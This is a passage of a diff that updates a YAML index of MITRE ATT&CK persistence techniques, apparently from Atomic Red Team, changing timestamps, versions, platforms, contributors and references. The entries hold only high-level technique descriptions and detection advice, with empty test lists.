   T1542.003:
@@ -28191,11 +28572,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28267,9 +28647,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28285,12 +28665,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28365,7 +28744,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28408,7 +28786,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28432,8 +28810,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28588,31 +28964,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28629,6 +28985,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -28639,9 +28996,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -28649,17 +29010,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -28667,79 +29048,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -28769,6 +29144,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -28779,6 +29155,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -28787,13 +29164,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -28835,9 +29212,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -28905,19 +29279,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -28933,8 +29306,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28948,7 +29321,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -28974,6 +29347,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -29001,42 +29378,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -29051,13 +29397,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -29065,11 +29416,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -29100,7 +29474,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -29138,13 +29512,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -29170,7 +29542,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -29212,7 +29584,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -29290,11 +29661,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29374,35 +29744,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29426,71 +29771,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
